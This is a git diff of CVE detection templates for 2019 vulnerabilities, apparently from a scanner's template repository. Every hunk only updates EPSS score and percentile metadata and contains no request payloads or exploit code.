b/http/cves/2019/CVE-2019-13396.yaml index 187d9cab396..49e0b5fccf6 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-13396 cwe-id: CWE-22 epss-score: 0.66535 - epss-percentile: 0.98475 + epss-percentile: 0.98478 cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index 2203c640d2d..ae050900997 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-14205 cwe-id: CWE-22 - epss-score: 0.67086 - epss-percentile: 0.98499 + epss-score: 0.83326 + epss-percentile: 0.99249 cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14206.yaml b/http/cves/2019/CVE-2019-14206.yaml index 50220abda28..f582961f1f7 100644 --- a/http/cves/2019/CVE-2019-14206.yaml +++ b/http/cves/2019/CVE-2019-14206.yaml @@ -22,8 +22,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-14206 cwe-id: CWE-22 - epss-score: 0.24576 - epss-percentile: 0.9595 + epss-score: 0.22694 + epss-percentile: 0.95681 cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index 1b5eaa8c6c9..1897f8e9364 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14223 cwe-id: CWE-601 - epss-score: 0.59279 - epss-percentile: 0.98165 + epss-score: 0.37266 + epss-percentile: 0.97045 cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index e044eba8b8d..fa456a980f5 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-14251 cwe-id: CWE-22 - epss-score: 0.64701 - epss-percentile: 0.98397 + epss-score: 0.56609 + epss-percentile: 0.98039 cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 62dce84a154..167a0c3e755 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2019-14312 cwe-id: CWE-22 - epss-score: 0.39761 - epss-percentile: 0.9719 + epss-score: 0.55645 + epss-percentile: 0.97998 cpe: cpe:2.3:a:aptana:jaxer:1.0.3.4547:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index 4164805229e..c7098842341 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-14470 cwe-id: CWE-79 epss-score: 0.30592 - epss-percentile: 0.96569 + epss-percentile: 0.96571 cpe: cpe:2.3:a:instagram-php-api_project:instagram-php-api:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index 9715f18def2..502413ef9cb 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-14530 cwe-id: CWE-22 epss-score: 0.78542 - epss-percentile: 0.98992 + epss-percentile: 0.98991 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index afb47574da2..9000dff23db 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-14696 cwe-id: CWE-79 epss-score: 0.13448 - epss-percentile: 0.93988 + epss-percentile: 0.93983 cpe: cpe:2.3:a:open-school:open-school:2.3:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 4fdda2cf1f0..e6bff99af63 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-14750 cwe-id: CWE-79 epss-score: 0.03327 - epss-percentile: 0.86933 + epss-percentile: 0.86935 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 0adb7da0b3b..6231519dddd 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-14789 cwe-id: CWE-79 epss-score: 0.00628 - epss-percentile: 0.69682 + epss-percentile: 0.69669 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-14950.yaml b/http/cves/2019/CVE-2019-14950.yaml index 977e63252e9..6260c8dabc9 100644 --- a/http/cves/2019/CVE-2019-14950.yaml +++ b/http/cves/2019/CVE-2019-14950.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-14950 cwe-id: CWE-79 epss-score: 0.05959 - epss-percentile: 0.90377 + epss-percentile: 0.90379 cpe: cpe:2.3:a:3cx:live_chat:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index 5b72120aeea..648d31b2376 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-15043 cwe-id: CWE-306 epss-score: 0.90497 - epss-percentile: 0.99589 + epss-percentile: 0.99587 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index e90147cfb22..266e8d8761e 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-15501 cwe-id: CWE-79 epss-score: 0.09038 - epss-percentile: 0.92388 + epss-percentile: 0.92384 cpe: cpe:2.3:a:lsoft:listserv:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index 92f5a6e59e5..5e9b01cbd4f 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-15713 cwe-id: CWE-79 epss-score: 0.04716 - epss-percentile: 0.8906 + epss-percentile: 0.89056 cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-15774.yaml b/http/cves/2019/CVE-2019-15774.yaml index 079d7f3448b..c0beca60ca5 100644 --- a/http/cves/2019/CVE-2019-15774.yaml +++ b/http/cves/2019/CVE-2019-15774.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15774 cwe-id: CWE-601 epss-score: 0.00933 - epss-percentile: 0.75669 + epss-percentile: 0.75662 cpe: cpe:2.3:a:booking_project:booking:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml index 93539c02eb1..0b3ca43be7a 100644 --- a/http/cves/2019/CVE-2019-15811.yaml +++ b/http/cves/2019/CVE-2019-15811.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-15811 cwe-id: CWE-79 epss-score: 0.01196 - epss-percentile: 0.78458 + epss-percentile: 0.78454 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index 85a7f791eca..5bd379db392 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-15829 cwe-id: CWE-79 epss-score: 0.01087 - epss-percentile: 0.77456 + epss-percentile: 0.77453 cpe: cpe:2.3:a:greentreelabs:gallery_photoblocks:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index bf4d6576c8a..100ef6e9a5c 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-15858 cwe-id: CWE-306 epss-score: 0.59563 - epss-percentile: 0.98175 + epss-percentile: 0.98177 cpe: cpe:2.3:a:webcraftic:woody_ad_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 7ea0ca0f9ec..8df85ae142d 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-16057 cwe-id: CWE-78 epss-score: 0.9375 - epss-percentile: 0.99841 + epss-percentile: 0.99843 cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml index c3a3d90b4c1..8bd6f73e66a 100644 --- a/http/cves/2019/CVE-2019-16123.yaml +++ b/http/cves/2019/CVE-2019-16123.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-16123 cwe-id: CWE-22 epss-score: 0.47663 - epss-percentile: 0.97609 + epss-percentile: 0.97604 cpe: cpe:2.3:a:kartatopia:piluscart:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml index 41a433ccb86..c55b37db8f1 100644 --- a/http/cves/2019/CVE-2019-16313.yaml +++ b/http/cves/2019/CVE-2019-16313.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-16313 cwe-id: CWE-798 epss-score: 0.93999 - epss-percentile: 0.99885 + epss-percentile: 0.99884 cpe: cpe:2.3:o:ifw8:fr6_firmware:4.31:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index cdf219c43cf..ed582f39df8 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-16332 cwe-id: CWE-79 epss-score: 0.17699 - epss-percentile: 0.94901 + epss-percentile: 0.94899 cpe: cpe:2.3:a:api_bearer_auth_project:api_bearer_auth:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index 99dc43058ea..5e97e6b2fdd 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-16525 cwe-id: CWE-79 epss-score: 0.10678 - epss-percentile: 0.93091 + epss-percentile: 0.93085 cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index 697aba58b10..b1dd74ad62b 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-16662 cwe-id: CWE-78 epss-score: 0.94461 - epss-percentile: 0.99994 + epss-percentile: 0.99993 cpe: cpe:2.3:a:rconfig:rconfig:3.9.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index dea037286c3..562352af770 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-16759 cwe-id: CWE-94 epss-score: 0.94407 - epss-percentile: 0.99975 + epss-percentile: 0.99974 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml index 62cfce5fead..9982f6ea17c 100644 --- a/http/cves/2019/CVE-2019-16920.yaml +++ b/http/cves/2019/CVE-2019-16920.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-16920 cwe-id: CWE-78 epss-score: 0.9438 - epss-percentile: 0.99965 + epss-percentile: 0.99964 cpe: cpe:2.3:o:dlink:dir-655_firmware:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index 8d4232f5260..6bf8e652066 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-16931 cwe-id: CWE-79 epss-score: 0.01991 - epss-percentile: 0.83191 + epss-percentile: 0.83189 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 29bd1474981..84f2aec610a 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-16932 cwe-id: CWE-918 epss-score: 0.82175 - epss-percentile: 0.99179 + epss-percentile: 0.9918 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-17228.yaml b/http/cves/2019/CVE-2019-17228.yaml index 92b95e4cb6a..f05643a3a27 100644 --- a/http/cves/2019/CVE-2019-17228.yaml +++ b/http/cves/2019/CVE-2019-17228.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-17228 cwe-id: CWE-345 epss-score: 0.02088 - epss-percentile: 0.83577 + epss-percentile: 0.83574 cpe: cpe:2.3:a:stylemixthemes:motors_-_car_dealer\,_classifieds_\&_listing:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-17230.yaml b/http/cves/2019/CVE-2019-17230.yaml index 71bb5c62f75..925e87af603 100644 --- a/http/cves/2019/CVE-2019-17230.yaml +++ b/http/cves/2019/CVE-2019-17230.yaml @@ -19,7 +19,7 @@ info: cvss-score: 5.3 cve-id: CVE-2019-17230 epss-score: 0.0849 - epss-percentile: 0.921 + epss-percentile: 0.92094 cpe: cpe:2.3:a:mageewp:onetone:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-17231.yaml b/http/cves/2019/CVE-2019-17231.yaml index d66ff682632..bec2b19e14a 100644 --- a/http/cves/2019/CVE-2019-17231.yaml +++ b/http/cves/2019/CVE-2019-17231.yaml @@ -19,7 +19,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-17231 epss-score: 0.00296 - epss-percentile: 0.52514 + epss-percentile: 0.52501 cpe: cpe:2.3:a:mageewp:onetone:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-17232.yaml b/http/cves/2019/CVE-2019-17232.yaml index 0ac7e7f494f..79233460f97 100644 --- a/http/cves/2019/CVE-2019-17232.yaml +++ b/http/cves/2019/CVE-2019-17232.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-17232 cwe-id: CWE-306 epss-score: 0.08596 - epss-percentile: 0.92162 + epss-percentile: 0.92155 cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-17233.yaml b/http/cves/2019/CVE-2019-17233.yaml index 9eb4e9c5f5a..96fd3cd4c65 100644 --- a/http/cves/2019/CVE-2019-17233.yaml +++ b/http/cves/2019/CVE-2019-17233.yaml @@ -18,7 +18,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-17233 epss-score: 0.02533 - epss-percentile: 0.85051 + epss-percentile: 0.85046 cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 50d124afb65..f476a968b4f 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-17382 cwe-id: CWE-639 epss-score: 0.93651 - epss-percentile: 0.99831 + epss-percentile: 0.99833 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 100 diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml index 0cede0c4c91..78a89eed567 100644 --- a/http/cves/2019/CVE-2019-17418.yaml +++ b/http/cves/2019/CVE-2019-17418.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-17418 cwe-id: CWE-89 epss-score: 0.93533 - epss-percentile: 0.99817 + epss-percentile: 0.99819 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index 492b3ba3757..fd290d5d13e 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-17538 cwe-id: CWE-22 epss-score: 0.91153 - epss-percentile: 0.99628 + epss-percentile: 0.99626 cpe: cpe:2.3:a:jnoj:jiangnan_online_judge:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 69c635ed4d0..d308a52576e 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-17558 cwe-id: CWE-74 epss-score: 0.94454 - epss-percentile: 0.99992 + epss-percentile: 0.99991 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-17564.yaml b/http/cves/2019/CVE-2019-17564.yaml index d4acae4c9f7..dd3718666dd 100644 --- a/http/cves/2019/CVE-2019-17564.yaml +++ b/http/cves/2019/CVE-2019-17564.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-17564 cwe-id: CWE-502 epss-score: 0.94048 - epss-percentile: 0.99894 + epss-percentile: 0.99893 cpe: cpe:2.3:a:apache:dubbo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index 2bf2b5611c9..add5ab5f1c8 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-17662 cwe-id: CWE-22 epss-score: 0.94097 - epss-percentile: 0.99902 + epss-percentile: 0.99901 cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index 088ae6935ae..9d05e55a954 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-19134 cwe-id: CWE-79 epss-score: 0.07948 - epss-percentile: 0.918 + epss-percentile: 0.91797 cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index 13b5eea040c..64a1f515ce0 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-1943 cwe-id: CWE-601 epss-score: 0.22946 - epss-percentile: 0.95715 + epss-percentile: 0.9572 cpe: cpe:2.3:o:cisco:sg200-50_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2019/CVE-2019-19822.yaml b/http/cves/2019/CVE-2019-19822.yaml index f141e8d2522..f8ea343e4c2 100644 --- a/http/cves/2019/CVE-2019-19822.yaml +++ b/http/cves/2019/CVE-2019-19822.yaml @@ -16,7 +16,7 @@ info: classification: cve-id: CVE-2019-19822 epss-score: 0.43036 - epss-percentile: 0.9738 + epss-percentile: 0.97377 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-306 diff --git a/http/cves/2019/CVE-2019-19825.yaml b/http/cves/2019/CVE-2019-19825.yaml index 0d0731a4eec..0d0641046a9 100644 --- a/http/cves/2019/CVE-2019-19825.yaml +++ b/http/cves/2019/CVE-2019-19825.yaml @@ -16,7 +16,7 @@ info: classification: cve-id: CVE-2019-19825 epss-score: 0.28752 - epss-percentile: 0.96397 + epss-percentile: 0.96402 cwe-id: CWE-287 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml index c2a6fe8f42b..6327d25f694 100644 --- a/http/cves/2019/CVE-2019-19908.yaml +++ b/http/cves/2019/CVE-2019-19908.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-19908 cwe-id: CWE-79 epss-score: 0.54847 - epss-percentile: 0.9796 + epss-percentile: 0.97957 cpe: cpe:2.3:a:ciprianmp:phpmychat-plus:1.98:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index 99992244cdb..1646f15570d 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-19985 cwe-id: CWE-862 epss-score: 0.86715 - epss-percentile: 0.99397 + epss-percentile: 0.99399 cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index 4bfae36e77a..2faaf2c621c 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-20141 cwe-id: CWE-79 epss-score: 0.12494 - epss-percentile: 0.9371 + epss-percentile: 0.93706 cpe: cpe:2.3:a:laborator:neon:2.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 4476b7c15fe..2f848f9916a 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-20183 cwe-id: CWE-434 epss-score: 0.56083 - epss-percentile: 0.98018 + epss-percentile: 0.98016 cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 1e3d6101fc0..730d4ae546d 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-20210 cwe-id: CWE-79 epss-score: 0.00382 - epss-percentile: 0.59036 + epss-percentile: 0.59029 cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20504.yaml b/http/cves/2019/CVE-2019-20504.yaml index 32325629ca8..5ef966c47b2 100644 --- a/http/cves/2019/CVE-2019-20504.yaml +++ b/http/cves/2019/CVE-2019-20504.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-20504 cwe-id: CWE-78 epss-score: 0.55808 - epss-percentile: 0.98009 + epss-percentile: 0.98007 cpe: cpe:2.3:a:quest:kace_systems_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-25141.yaml b/http/cves/2019/CVE-2019-25141.yaml index 032134337f3..2508460c58a 100644 --- a/http/cves/2019/CVE-2019-25141.yaml +++ b/http/cves/2019/CVE-2019-25141.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-25141 cwe-id: CWE-862 epss-score: 0.56985 - epss-percentile: 0.98053 + epss-percentile: 0.98052 cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-25152.yaml b/http/cves/2019/CVE-2019-25152.yaml index d21ab45b7fb..79ff4a8027d 100644 --- a/http/cves/2019/CVE-2019-25152.yaml +++ b/http/cves/2019/CVE-2019-25152.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.2 cve-id: CVE-2019-25152 epss-score: 0.30617 - epss-percentile: 0.96569 + epss-percentile: 0.96573 cpe: cpe:2.3:a:tychesoftwares:abandoned_cart_lite_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml index 3be23ee24ca..c8ae7f7d61a 100644 --- a/http/cves/2019/CVE-2019-2578.yaml +++ b/http/cves/2019/CVE-2019-2578.yaml @@ -20,7 +20,7 @@ info: cvss-score: 8.6 cve-id: CVE-2019-2578 epss-score: 0.81391 - epss-percentile: 0.99133 + epss-percentile: 0.99135 cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index 67579db2cd0..208b28467ff 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -20,7 +20,7 @@ info: cvss-score: 7.2 cve-id: CVE-2019-2616 epss-score: 0.94278 - epss-percentile: 0.99932 + epss-percentile: 0.99933 cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-2725.yaml b/http/cves/2019/CVE-2019-2725.yaml index d5f368497e4..a5de9a97373 100644 --- a/http/cves/2019/CVE-2019-2725.yaml +++ b/http/cves/2019/CVE-2019-2725.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-2725 cwe-id: CWE-74 epss-score: 0.9447 - epss-percentile: 0.99997 + epss-percentile: 0.99996 cpe: cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index 7193cdea7ec..19c22548d26 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -20,7 +20,7 @@ info: cvss-score: 7.2 cve-id: CVE-2019-2767 epss-score: 0.53446 - epss-percentile: 0.97892 + epss-percentile: 0.97889 cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3396.yaml b/http/cves/2019/CVE-2019-3396.yaml index 271f13efd99..ef47cbf8553 100644 --- a/http/cves/2019/CVE-2019-3396.yaml +++ b/http/cves/2019/CVE-2019-3396.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-3396 cwe-id: CWE-22 - epss-score: 0.94472 - epss-percentile: 0.99997 + epss-score: 0.94471 + epss-percentile: 0.99996 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3401.yaml 